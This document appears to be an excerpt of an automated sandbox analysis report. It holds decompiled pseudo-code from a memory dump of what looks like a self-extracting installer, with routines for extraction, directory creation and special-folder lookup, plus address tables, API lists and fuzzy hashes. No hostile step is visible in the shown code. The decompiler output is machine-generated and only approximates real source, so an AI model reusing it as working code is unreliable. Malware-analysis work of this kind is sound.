											 *((intOrPtr*)(_t260 + 0x28)) =  *((intOrPtr*)(_t260 + 0x28)) +  *((intOrPtr*)(_t445 + 0x30));
											asm("adc [eax+0x2c], ecx");
											 *((intOrPtr*)(_t260 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) +  *((intOrPtr*)(_t445 + 0x10));
											asm("adc [eax+0x24], ecx");
											_t342 = _t260;
											continue;
										}
										 *(_t445 + 0x58) =  *(_t445 + 0x58) & 0x00000000;
										_t261 =  *(_t445 + 0x60);
										__eflags = _t261;
										if(_t261 != 0) {
											_t261 =  *((intOrPtr*)( *_t261))(_t261, 0x41d530, _t445 + 0x58);
										}
										 *(_t445 - 4) = 1;
										 *((char*)(_t445 + 0x7b)) = 0;
										 *((char*)(_t445 + 0x6f)) = 0;
										E004147DF(_t261, _t445);
										_t436 = E004171F6(_t445 - 0x7c, _t445 + 0x30, _t443, __eflags,  *((intOrPtr*)(_t443 + 0xc)),  *((intOrPtr*)(_t443 + 0x108)),  *((intOrPtr*)(_t443 + 0x10c)), _t443 + 0x10, _t344, _t445 + 0x30,  *(_t445 + 0x50),  *(_t445 + 0x54), 0,  *(_t445 + 0x58), _t445 + 0x7b, _t445 + 0x6f, _t445);
										__eflags = _t436 - 1;
										if(_t436 == 1) {
											L87:
											_t376 =  *(_t445 + 0x3c);
											__eflags =  *(_t376 + 0x24);
											 *((char*)(_t445 + 0x4f)) =  *(_t376 + 0x24) == 0;
											__eflags = _t436 - 1;
											_t209 = (0 | _t436 == 0x00000001) + 1; // 0x1
											_t437 = _t209;
											_t267 = E00417C9B(_t376, _t437);
											 *(_t445 + 0x40) = _t267;
											__eflags = _t267;
											if(_t267 == 0) {
												__eflags =  *((char*)(_t445 + 0x4f));
												if( *((char*)(_t445 + 0x4f)) == 0) {
													L105:
													_push( *_t445);
													L0041C160();
													_t268 =  *(_t445 + 0x58);
													goto L106;
												}
												_t270 =  *(_t445 + 0x5c);
												__eflags = _t270;
												if(_t270 == 0) {
													goto L105;
												}
												_t436 =  *((intOrPtr*)( *_t270 + 0x14))(_t270, 2, _t344, _t437);
												__eflags = _t436;
												if(_t436 == 0) {
													goto L105;
												}
												goto L102;
											}
											_push( *_t445);
											L0041C160();
											_t284 =  *(_t445 + 0x58);
											__eflags = _t284;
											if(_t284 != 0) {
												 *((intOrPtr*)( *_t284 + 8))(_t284);
											}
											_t285 =  *(_t445 + 0x50);
											__eflags = _t285;
											if(_t285 != 0) {
												 *((intOrPtr*)( *_t285 + 8))(_t285);
											}
											_t286 =  *(_t445 + 0x5c);
											__eflags = _t286;
											if(_t286 != 0) {
												 *((intOrPtr*)( *_t286 + 8))(_t286);
											}
											E00417CCA(_t445 - 0x7c);
											_t288 =  *(_t445 + 0x54);
											__eflags = _t288;
											if(_t288 != 0) {
												 *((intOrPtr*)( *_t288 + 8))(_t288);
											}
											_t289 =  *(_t445 + 0x60);
											__eflags = _t289;
											if(_t289 != 0) {
												 *((intOrPtr*)( *_t289 + 8))(_t289);
											}
											_t278 =  *(_t445 + 0x40);
											goto L110;
										} else {
											__eflags = _t436 - 0x80004001;
											if(_t436 == 0x80004001) {
												goto L87;
											}
											__eflags = _t436;
											if(_t436 != 0) {
												L102:
												_push( *_t445);
												L0041C160();
												_t272 =  *(_t445 + 0x58);
												L103:
												__eflags = _t272;
												if(_t272 != 0) {
													 *((intOrPtr*)( *_t272 + 8))(_t272);
												}
												goto L71;
											}
											_t436 = E00417C9B( *(_t445 + 0x3c), 2);
											_push( *_t445);
											L0041C160();
											_t268 =  *(_t445 + 0x58);
											__eflags = _t436;
											if(_t436 == 0) {
												L106:
												__eflags = _t268;
												if(_t268 != 0) {
													 *((intOrPtr*)( *_t268 + 8))(_t268);
												}
												_t230 = _t445 - 4;
												 *_t230 =  *(_t445 - 4) & 0x00000000;
												__eflags =  *_t230;
												goto L109;
											}
											goto L103;
										}
									}
									L71:
									_t273 =  *(_t445 + 0x50);
									__eflags = _t273;
									if(_t273 != 0) {
										 *((intOrPtr*)( *_t273 + 8))(_t273);
									}
									_t274 =  *(_t445 + 0x5c);
									__eflags = _t274;
									if(_t274 != 0) {
										 *((intOrPtr*)( *_t274 + 8))(_t274);
									}
									E00417CCA(_t445 - 0x7c);
									_t276 =  *(_t445 + 0x54);
									__eflags = _t276;
									if(_t276 != 0) {
										 *((intOrPtr*)( *_t276 + 8))(_t276);
									}
									_t277 =  *(_t445 + 0x60);
									__eflags = _t277;
									if(_t277 != 0) {
										 *((intOrPtr*)( *_t277 + 8))(_t277);
									}
									L24:
									_t278 = _t436;
									goto L110;
								} else {
									_t296 =  *((intOrPtr*)(_t443 + 0x18));
									_t398 =  *((intOrPtr*)(_t443 + 0x40));
									_t423 =  *(_t398 + 4 + _t344 * 4);
									 *((intOrPtr*)(_t445 + 0x10)) =  *((intOrPtr*)(_t296 + _t423 * 8)) -  *((intOrPtr*)(_t296 +  *(_t398 + _t344 * 4) * 8));
									asm("sbb edx, [eax+ecx*8+0x4]");
									 *((intOrPtr*)(_t445 + 0x14)) =  *((intOrPtr*)(_t296 + 4 + _t423 * 8));
									_t439 = _t434 + 1;
									__eflags = _t439;
									 *(_t445 + 0x20) = _t439;
									_t344 =  *(_t445 - 0x14);
									_t434 =  *( *((intOrPtr*)(_t443 + 0x128)) + _t344 * 4);
									_t298 =  *(_t445 + 0x44);
									while(1) {
										_t298 = _t298 + 1;
										 *(_t445 + 0x48) = _t298;
										__eflags = _t298 -  *((intOrPtr*)(_t445 + 0x74));
										if(_t298 >=  *((intOrPtr*)(_t445 + 0x74))) {
											break;
										}
										__eflags =  *(_t445 + 0x7f);
										if( *(_t445 + 0x7f) == 0) {
											_t404 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t298 * 4);
										} else {
											_t404 = _t298;
										}
										_t425 =  *((intOrPtr*)(_t443 + 0x12c));
										__eflags =  *((intOrPtr*)(_t425 + _t404 * 4)) - _t344;
										if( *((intOrPtr*)(_t425 + _t404 * 4)) != _t344) {
											break;
										} else {
											__eflags = _t404 -  *(_t445 + 0x20);
											if(_t404 <  *(_t445 + 0x20)) {
												break;
											}
											 *(_t445 + 0x20) = _t404 + 1;
											continue;
										}
									}
									_t299 = _t298 -  *(_t445 + 0x44);
									__eflags = _t299;
									 *(_t445 + 0x40) = _t299;
									 *(_t445 + 0x48) = _t434;
									while(1) {
										__eflags =  *(_t445 + 0x48) -  *(_t445 + 0x20);
										if( *(_t445 + 0x48) >=  *(_t445 + 0x20)) {
											goto L70;
										}
										 *((intOrPtr*)(_t445 + 0x30)) =  *((intOrPtr*)(_t445 + 0x30)) +  *((intOrPtr*)( *(_t445 + 0x48) * 0x18 +  *((intOrPtr*)(_t443 + 0x68))));
										asm("adc [ebp+0x34], eax");
										 *(_t445 + 0x48) =  *(_t445 + 0x48) + 1;
									}
									goto L70;
								}
							}
							__eflags = _t433;
							if(_t433 != 0) {
								 *((intOrPtr*)( *_t433 + 8))(_t433);
							}
							_t304 =  *(_t445 + 0x5c);
							__eflags = _t304;
							if(_t304 != 0) {
								 *((intOrPtr*)( *_t304 + 8))(_t304);
							}
							E00417CCA(_t445 - 0x7c);
							_t306 =  *(_t445 + 0x54);
							__eflags = _t306;
							if(_t306 != 0) {
								 *((intOrPtr*)( *_t306 + 8))(_t306);
							}
							_t307 =  *(_t445 + 0x60);
							__eflags = _t307;
							if(_t307 != 0) {
								 *((intOrPtr*)( *_t307 + 8))(_t307);
							}
							goto L7;
						}
						__eflags = _t433;
						if(_t433 != 0) {
							 *((intOrPtr*)( *_t433 + 8))(_t433);
						}
						_t313 =  *(_t445 + 0x5c);
						__eflags = _t313;
						if(_t313 != 0) {
							 *((intOrPtr*)( *_t313 + 8))(_t313);
						}
						E00417CCA(_t445 - 0x7c);
						_t315 =  *(_t445 + 0x54);
						__eflags = _t315;
						if(_t315 != 0) {
							 *((intOrPtr*)( *_t315 + 8))(_t315);
						}
						_t316 =  *(_t445 + 0x60);
						__eflags = _t316;
						if(_t316 != 0) {
							 *((intOrPtr*)( *_t316 + 8))(_t316);
						}
						_t278 = _t343;
						goto L110;
					}
					 *((intOrPtr*)( *_t341 + 8))(_t341);
					goto L24;
				} else {
					if(_t428 != 0) {
						 *((intOrPtr*)( *_t428 + 8))(_t428);
					}
					L7:
					_t278 = 0;
					L110:
					 *[fs:0x0] =  *((intOrPtr*)(_t445 - 0xc));
					return _t278;
				}
			}


























































                                          0x00417d3b
                                          0x00417d46
                                          0x00417d4b
                                          0x00417d4e
                                          0x00417d51
                                          0x00417d53
                                          0x00417d58
                                          0x00417d5d
                                          0x00417d5d
                                          0x00417d60
                                          0x00417d63
                                          0x00417d6a
                                          0x00417d6e
                                          0x00417d75
                                          0x00417d7a
                                          0x00417d7a
                                          0x00417d82
                                          0x00417d95
                                          0x00417d99
                                          0x00417d9c
                                          0x00417d9c
                                          0x00417d9e
                                          0x00417d9e
                                          0x00417da1
                                          0x00417da4
                                          0x00000000
                                          0x00000000
                                          0x00417da6
                                          0x00417daa
                                          0x00417db3
                                          0x00417dac
                                          0x00417dac
                                          0x00417dac
                                          0x00417dbc
                                          0x00417dbf
                                          0x00417dc2
                                          0x00417dc5
                                          0x00417e11
                                          0x00417e11
                                          0x00000000
                                          0x00417dc7
                                          0x00417dc7
                                          0x00417dca
                                          0x00417dd0
                                          0x00417dd6
                                          0x00417dd9
                                          0x00417ddc
                                          0x00417ddc
                                          0x00417ddf
                                          0x00417ddf
                                          0x00417de2
                                          0x00000000
                                          0x00000000
                                          0x00417df0
                                          0x00417df7
                                          0x00417dfa
                                          0x00417dfd
                                          0x00417e00
                                          0x00417e00
                                          0x00417e05
                                          0x00417e08
                                          0x00417e0b
                                          0x00417e0e
                                          0x00000000
                                          0x00417e0e
                                          0x00417dcc
                                          0x00417dce
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417dce
                                          0x00417dc5
                                          0x00417e1d
                                          0x00417e22
                                          0x00417e24
                                          0x00417e33
                                          0x00417e35
                                          0x00417e3b
                                          0x00417e3d
                                          0x00417e4a
                                          0x00417e4a
                                          0x00417e3f
                                          0x00417e46
                                          0x00417e46
                                          0x00417e4c
                                          0x00417e4f
                                          0x00417e52
                                          0x00417e54
                                          0x00417e59
                                          0x00417e59
                                          0x00417e5e
                                          0x00417e64
                                          0x00417e6e
                                          0x00417e73
                                          0x00417e83
                                          0x00417e85
                                          0x00417e87
                                          0x00417e8f
                                          0x00417e91
                                          0x00417eb0
                                          0x00417eb0
                                          0x00417e93
                                          0x00417e93
                                          0x00417e99
                                          0x00417e9c
                                          0x00417ea2
                                          0x00417ea5
                                          0x00417eab
                                          0x00417eab
                                          0x00417eb2
                                          0x00417eb4
                                          0x00417eb7
                                          0x00417eba
                                          0x00417ebc
                                          0x00417ec1
                                          0x00417ec1
                                          0x00417ec7
                                          0x00417ecd
                                          0x00417ed0
                                          0x00417ed9
                                          0x00417edf
                                          0x00417ee4
                                          0x00417eea
                                          0x00417eea
                                          0x00417eed
                                          0x00417ef0
                                          0x00417ef3
                                          0x00417ef3
                                          0x00417efd
                                          0x00417eff
                                          0x00417f01
                                          0x00000000
                                          0x00000000
                                          0x00417f43
                                          0x00417f46
                                          0x00417f49
                                          0x00417f8f
                                          0x00417f92
                                          0x00417f95
                                          0x00417f98
                                          0x00417f9b
                                          0x00417f9e
                                          0x00417fa7
                                          0x00417fa0
                                          0x00417fa0
                                          0x00417fa0
                                          0x00417fb0
                                          0x00417fb3
                                          0x00417fb6
                                          0x00417fbd
                                          0x00417fc0
                                          0x00418058
                                          0x0041806a
                                          0x00418075
                                          0x0041807f
                                          0x00418082
                                          0x00418084
                                          0x004180cb
                                          0x004180ce
                                          0x004180d2
                                          0x0041824c
                                          0x0041824f
                                          0x00418252
                                          0x00418258
                                          0x0041825e
                                          0x00418264
                                          0x00418267
                                          0x00000000
                                          0x00418267
                                          0x004180d8
                                          0x004180dc
                                          0x004180df
                                          0x004180e1
                                          0x004180ef
                                          0x004180ef
                                          0x004180f1
                                          0x004180f5
                                          0x004180f9
                                          0x00418100
                                          0x0041813d
                                          0x0041813f
                                          0x00418142
                                          0x00418179
                                          0x00418179
                                          0x0041817c
                                          0x00418180
                                          0x00418186
                                          0x0041818c
                                          0x0041818c
                                          0x00418190
                                          0x00418195
                                          0x00418198
                                          0x0041819a
                                          0x004181f6
                                          0x004181fa
                                          0x00418232
                                          0x00418232
                                          0x00418235
                                          0x0041823b
                                          0x00000000
                                          0x0041823b
                                          0x004181fc
                                          0x004181ff
                                          0x00418201
                                          0x00000000
                                          0x00000000
                                          0x0041820d
                                          0x0041820f
                                          0x00418211
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00418211
                                          0x0041819c
                                          0x0041819f
                                          0x004181a5
                                          0x004181a8
                                          0x004181aa
                                          0x004181af
                                          0x004181af
                                          0x004181b2
                                          0x004181b5
                                          0x004181b7
                                          0x004181bc
                                          0x004181bc
                                          0x004181bf
                                          0x004181c2
                                          0x004181c4
                                          0x004181c9
                                          0x004181c9
                                          0x004181cf
                                          0x004181d4
                                          0x004181d7
                                          0x004181d9
                                          0x004181de
                                          0x004181de
                                          0x004181e1
                                          0x004181e4
                                          0x004181e6
                                          0x004181eb
                                          0x004181eb
                                          0x004181ee
                                          0x00000000
                                          0x00418144
                                          0x00418144
                                          0x0041814a
                                          0x00000000
                                          0x00000000
                                          0x0041814c
                                          0x0041814e
                                          0x00418213
                                          0x00418213
                                          0x00418216
                                          0x0041821b
                                          0x0041821f
                                          0x0041821f
                                          0x00418221
                                          0x0041822a
                                          0x0041822a
                                          0x00000000
                                          0x00418221
                                          0x0041815e
                                          0x00418160
                                          0x00418163
                                          0x00418169
                                          0x0041816c
                                          0x0041816e
                                          0x0041823e
                                          0x0041823e
                                          0x00418240
                                          0x00418245
                                          0x00418245
                                          0x00418248
                                          0x00418248
                                          0x00418248
                                          0x00000000
                                          0x00418248
                                          0x00000000
                                          0x00418174
                                          0x00418142
                                          0x00418086
                                          0x00418086
                                          0x00418089
                                          0x0041808b
                                          0x00418090
                                          0x00418090
                                          0x00418093
                                          0x00418096
                                          0x00418098
                                          0x0041809d
                                          0x0041809d
                                          0x004180a3
                                          0x004180a8
                                          0x004180ab
                                          0x004180ad
                                          0x004180b2
                                          0x004180b2
                                          0x004180b5
                                          0x004180b8
                                          0x004180ba
                                          0x004180c3
                                          0x004180c3
                                          0x00417e2c
                                          0x00417e2c
                                          0x00000000
                                          0x00417fc6
                                          0x00417fc6
                                          0x00417fc9
                                          0x00417fcc
                                          0x00417fd9
                                          0x00417fe0
                                          0x00417fe4
                                          0x00417fe7
                                          0x00417fe7
                                          0x00417fe8
                                          0x00417ff1
                                          0x00417ff4
                                          0x00417ff7
                                          0x00417ffa
                                          0x00417ffa
                                          0x00417ffb
                                          0x00417ffe
                                          0x00418001
                                          0x00000000
                                          0x00000000
                                          0x00418003
                                          0x00418007
                                          0x00418010
                                          0x00418009
                                          0x00418009
                                          0x00418009
                                          0x00418013
                                          0x00418019
                                          0x0041801c
                                          0x00000000
                                          0x0041801e
                                          0x0041801e
                                          0x00418021
                                          0x00000000
                                          0x00000000
                                          0x00418024
                                          0x00000000
                                          0x00418024
                                          0x0041801c
                                          0x00418029
                                          0x00418029
                                          0x0041802c
                                          0x0041802f
                                          0x00418032
                                          0x00418035
                                          0x00418038
                                          0x00000000
                                          0x00000000
                                          0x00418046
                                          0x00418050
                                          0x00418053
                                          0x00418053
                                          0x00000000
                                          0x00418032
                                          0x00417fc0
                                          0x00417f4b
                                          0x00417f4d
                                          0x00417f52
                                          0x00417f52
                                          0x00417f55
                                          0x00417f58
                                          0x00417f5a
                                          0x00417f5f
                                          0x00417f5f
                                          0x00417f65
                                          0x00417f6a
                                          0x00417f6d
                                          0x00417f6f
                                          0x00417f74
                                          0x00417f74
                                          0x00417f77
                                          0x00417f7a
                                          0x00417f7c
                                          0x00417f85
                                          0x00417f85
                                          0x00000000
                                          0x00417f7c
                                          0x00417f03
                                          0x00417f05
                                          0x00417f0a
                                          0x00417f0a
                                          0x00417f0d
                                          0x00417f10
                                          0x00417f12
                                          0x00417f17
                                          0x00417f17
                                          0x00417f1d
                                          0x00417f22
                                          0x00417f25
                                          0x00417f27
                                          0x00417f2c
                                          0x00417f2c
                                          0x00417f2f
                                          0x00417f32
                                          0x00417f34
                                          0x00417f39
                                          0x00417f39
                                          0x00417f3c
                                          0x00000000
                                          0x00417f3c
                                          0x00417e29
                                          0x00000000
                                          0x00417d84
                                          0x00417d86
                                          0x00417d8b
                                          0x00417d8b
                                          0x00417d8e
                                          0x00417d8e
                                          0x0041834a
                                          0x0041834d
                                          0x0041835b
                                          0x0041835b

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@$H_prolog
                                          • String ID:
                                          • API String ID: 417953191-0
                                          • Opcode ID: 8b3f70bcea95bb3576eb0139a9b8365af27ac33ad4d02b6cd0489b413736e0d2
                                          • Instruction ID: c1e2ab7089ad07afef8f572a599b18a794d17bcacd5927a223e3947e5adf6a37
                                          • Opcode Fuzzy Hash: 8b3f70bcea95bb3576eb0139a9b8365af27ac33ad4d02b6cd0489b413736e0d2
                                          • Instruction Fuzzy Hash: 6A124A70604249DFCB14CF68C894AEA7BB5BF49304F25456EF81A8B351DB39EC86CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040468A, Relevance: 10.6, APIs: 7, Instructions: 133stringtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0040468A(WCHAR* __ecx, struct _FILETIME* __edx) {
				signed int _v8;
				WCHAR* _v12;
				struct _FILETIME _v20;
				char _v32;
				signed int _t38;
				signed int _t41;
				signed int _t44;
				signed short _t48;
				signed char _t52;
				signed int _t60;
				signed int* _t66;
				void* _t67;
				WCHAR* _t78;
				signed int _t79;
				void* _t81;
				void* _t82;

				_t77 = __edx;
				_t66 = __ecx;
				_v12 = __ecx;
				_t38 = lstrlenW(__ecx);
				_t79 = _t38;
				_v8 = _t38;
				E00414803( &_v32, _t66);
				_t78 = E0040420B( &_v32, _t77, 0);
				_t41 =  *(_t66 + _t79 * 2 - 2) & 0x0000ffff;
				if(_t41 == 0x5c || _t41 == 0x2f) {
					 *((short*)(_t78 + _t79 * 2 - 2)) = 0;
					_t79 = _t79 - 1;
					_v8 = _t79;
				}
				while(E00403092(_t78) == 0) {
					while(_t79 > 0) {
						_t44 = _t78[_t79] & 0x0000ffff;
						if(_t44 == 0x2f || _t44 == 0x5c) {
							break;
						} else {
							_t79 = _t79 - 1;
							continue;
						}
					}
					if(_t79 == 0) {
						if(_v8 != 2) {
							L30:
							E00409684(_t77, 1, 0xc, _t66);
							_push(_v32);
							L0041C160();
							return 0;
						}
						_t48 =  *_t66 | 0x00000020;
						if(_t48 < 0x61 || _t48 > 0x7a || _t66[0] != 0x3a) {
							goto L30;
						} else {
							_t81 = 1;
							L29:
							_push(_v32);
							L0041C160();
							return _t81;
						}
					}
					_t78[_t79] = 0;
				}
				GetSystemTimeAsFileTime( &_v20);
				_t52 = GetFileAttributesW(_t78); // executed
				if((_t52 & 0x00000010) != 0) {
					L13:
					while(E00403092(_t78) != 0) {
						if(_t79 < _v8) {
							_t67 =  &(_t78[_t79]);
							memcpy(_t67, _v12 + _t79 * 2, _v8 - _t79 + 1);
							_t82 = _t82 + 0xc;
							if( *_t67 == 0) {
								L20:
								if(_t78[_t79] != 0) {
									_t60 = _t78[_t79] & 0x0000ffff;
									if(_t60 == 0x5c || _t60 == 0x2f) {
										goto L21;
									} else {
										L19:
										_t79 = _t79 + 1;
										goto L20;
									}
								}
								L21:
								_t78[_t79] = 0;
								continue;
							}
							goto L19;
						}
						_push(_v32);
						L0041C160();
						return 1;
					}
					E00409684(_t77, 1, 0xc, _t78);
					L12:
					_t81 = 0;
					goto L29;
				}
				_t77 =  &_v20;
				if(E00404402(_t78,  &_v20) == 0) {
					goto L13;
				}
				goto L12;
			}



















                                          0x0040468a
                                          0x00404692
                                          0x00404696
                                          0x00404699
                                          0x004046a3
                                          0x004046a5
                                          0x004046a8
                                          0x004046b7
                                          0x004046b9
                                          0x004046c1
                                          0x004046ca
                                          0x004046cf
                                          0x004046d0
                                          0x004046d0
                                          0x004046f6
                                          0x004046e4
                                          0x004046d5
                                          0x004046dc
                                          0x00000000
                                          0x004046e3
                                          0x004046e3
                                          0x00000000
                                          0x004046e3
                                          0x004046dc
                                          0x004046ea
                                          0x0040479c
                                          0x004047c8
                                          0x004047cd
                                          0x004047d2
                                          0x004047d5
                                          0x00000000
                                          0x004047dd
                                          0x004047a1
                                          0x004047a9
                                          0x00000000
                                          0x004047b8
                                          0x004047ba
                                          0x004047bb
                                          0x004047bb
                                          0x004047be
                                          0x00000000
                                          0x004047c4
                                          0x004047a9
                                          0x004046f2
                                          0x004046f2
                                          0x00404705
                                          0x0040470c
                                          0x00404714
                                          0x00000000
                                          0x0040472b
                                          0x00404788
                                          0x00404753
                                          0x00404757
                                          0x0040475e
                                          0x00404764
                                          0x00404777
                                          0x0040477b
                                          0x00404768
                                          0x0040476f
                                          0x00000000
                                          0x00404776
                                          0x00404776
                                          0x00404776
                                          0x00000000
                                          0x00404776
                                          0x0040476f
                                          0x0040477d
                                          0x0040477f
                                          0x00000000
                                          0x0040477f
                                          0x00000000
                                          0x00404766
                                          0x0040478a
                                          0x0040478d
                                          0x00000000
                                          0x00404795
                                          0x0040473b
                                          0x00404724
                                          0x00404724
                                          0x00000000
                                          0x00404724
                                          0x00404716
                                          0x00404722
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • lstrlenW.KERNEL32(?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 00404699
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                            • Part of subcall function 0040420B: wcsncpy.MSVCRT ref: 00404239
                                            • Part of subcall function 0040420B: ??3@YAXPAX@Z.MSVCRT ref: 00404244
                                          • GetSystemTimeAsFileTime.KERNEL32(00402D14,00000000,?,?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 00404705
                                          • GetFileAttributesW.KERNELBASE(00000000,?,?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 0040470C
                                          • memcpy.MSVCRT ref: 00404757
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040478D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004047BE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004047D5
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$FileTimememcpy$AttributesSystemlstrlenwcsncpy
                                          • String ID:
                                          • API String ID: 1217483450-0
                                          • Opcode ID: c1aab1735b3e41f9eced0e66e94fae73de9fd31691e0de986af2a9a7b4a091e8
                                          • Instruction ID: be3e48701bef0db7d10aa87f87c9b6a307b0c6ea187aa39f9109aeae5b1a0e1c
                                          • Opcode Fuzzy Hash: c1aab1735b3e41f9eced0e66e94fae73de9fd31691e0de986af2a9a7b4a091e8
                                          • Instruction Fuzzy Hash: 5B412BB5900215A6CB20BBA58885ABF73B4EF86704F504537EA02F32C1E73C9D4287DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040541A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E0040541A(void* __edx) {
				short _v96;
				char _v620;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				char* _t18;
				WCHAR* _t22;
				WCHAR* _t23;
				WCHAR* _t24;
				WCHAR* _t25;
				WCHAR* _t26;
				WCHAR* _t27;
				WCHAR* _t28;
				void* _t34;
				void* _t35;
				void* _t36;

				 *0x42275c = LoadLibraryA("kernel32");
				__imp__#17();
				E00403C85(E0041BD00());
				_t22 = 3;
				_t11 = E00403CE0(_t22);
				_t23 = 0x28;
				 *0x422760 = _t11;
				_t12 = E00403CE0(_t23);
				_t24 = 2;
				 *0x42274c = _t12;
				_t13 = E00403CE0(_t24);
				_t25 = 5;
				 *0x422738 = _t13;
				_t14 = E00403CE0(_t25);
				_t26 = 0x15;
				 *0x42273c = _t14;
				_t15 = E00403CE0(_t26);
				_t27 = 0x16;
				 *0x422754 = _t15;
				_t16 = E00403CE0(_t27);
				_t28 = 0x17;
				 *0x422748 = _t16;
				 *0x422744 = E00403CE0(_t28);
				 *0x422758 = 0;
				 *0x422750 = 0;
				_t34 = 0;
				do {
					_t18 =  &_v620;
					__imp__SHGetSpecialFolderPathW(0, _t18, _t34, 0); // executed
					_t38 = _t18;
					if(_t18 != 0) {
						wsprintfW( &_v96, L"SfxFolder%02d", _t34);
						_t36 = _t36 + 0xc;
						_t18 = E00404F69( &_v96,  &_v620, _t38, 1); // executed
						_t35 = 0;
						do {
							_t40 =  *((intOrPtr*)(_t35 + 0x42246c)) - _t34;
							if( *((intOrPtr*)(_t35 + 0x42246c)) == _t34) {
								_t6 = _t35 + 0x422470; // 0x41ea7c
								_t18 = E00404F69( *_t6,  &_v620, _t40, 0);
							}
							_t35 = _t35 + 8;
						} while (_t35 < 0x28);
					}
					_t34 = _t34 + 1;
				} while (_t34 < 0x40);
				return _t18;
			}






















                                          0x00405431
                                          0x00405436
                                          0x00405441
                                          0x00405448
                                          0x00405449
                                          0x00405450
                                          0x00405451
                                          0x00405456
                                          0x0040545d
                                          0x0040545e
                                          0x00405463
                                          0x0040546a
                                          0x0040546b
                                          0x00405470
                                          0x00405477
                                          0x00405478
                                          0x0040547d
                                          0x00405484
                                          0x00405485
                                          0x0040548a
                                          0x00405491
                                          0x00405492
                                          0x0040549e
                                          0x004054a3
                                          0x004054a9
                                          0x004054af
                                          0x004054b1
                                          0x004054b3
                                          0x004054bb
                                          0x004054c1
                                          0x004054c3
                                          0x004054cf
                                          0x004054d5
                                          0x004054e3
                                          0x004054e8
                                          0x004054ea
                                          0x004054ea
                                          0x004054f0
                                          0x004054f2
                                          0x004054ff
                                          0x004054ff
                                          0x00405504
                                          0x00405507
                                          0x004054ea
                                          0x0040550c
                                          0x0040550d
                                          0x00405516

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 0040542B
                                          • #17.COMCTL32(?,?,00000000), ref: 00405436
                                            • Part of subcall function 00403C85: GetUserDefaultUILanguage.KERNEL32(00405446,?,?,00000000), ref: 00403C8F
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32(?,?,00000000), ref: 00403D2F
                                            • Part of subcall function 00403CE0: wsprintfW.USER32 ref: 00403D40
                                            • Part of subcall function 00403CE0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403D55
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32 ref: 00403D5A
                                            • Part of subcall function 00403CE0: ??2@YAPAXI@Z.MSVCRT ref: 00403D75
                                            • Part of subcall function 00403CE0: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403D88
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32 ref: 00403D8F
                                            • Part of subcall function 00403CE0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403DA4
                                            • Part of subcall function 00403CE0: ??3@YAXPAX@Z.MSVCRT ref: 00403DB4
                                            • Part of subcall function 00403CE0: SetLastError.KERNEL32(?), ref: 00403DDB
                                            • Part of subcall function 00403CE0: lstrlenA.KERNEL32(0041E930), ref: 00403E11
                                            • Part of subcall function 00403CE0: ??2@YAPAXI@Z.MSVCRT ref: 00403E2C
                                            • Part of subcall function 00403CE0: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403E5E
                                            • Part of subcall function 00403CE0: ??3@YAXPAX@Z.MSVCRT ref: 00403DD2
                                            • Part of subcall function 00403CE0: _wtol.MSVCRT(?), ref: 00403E6F
                                            • Part of subcall function 00403CE0: MultiByteToWideChar.KERNEL32(00000000,0041E930,00000001,00000000,00000002), ref: 00403E8F
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004054BB
                                          • wsprintfW.USER32 ref: 004054CF
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD0
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD9
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
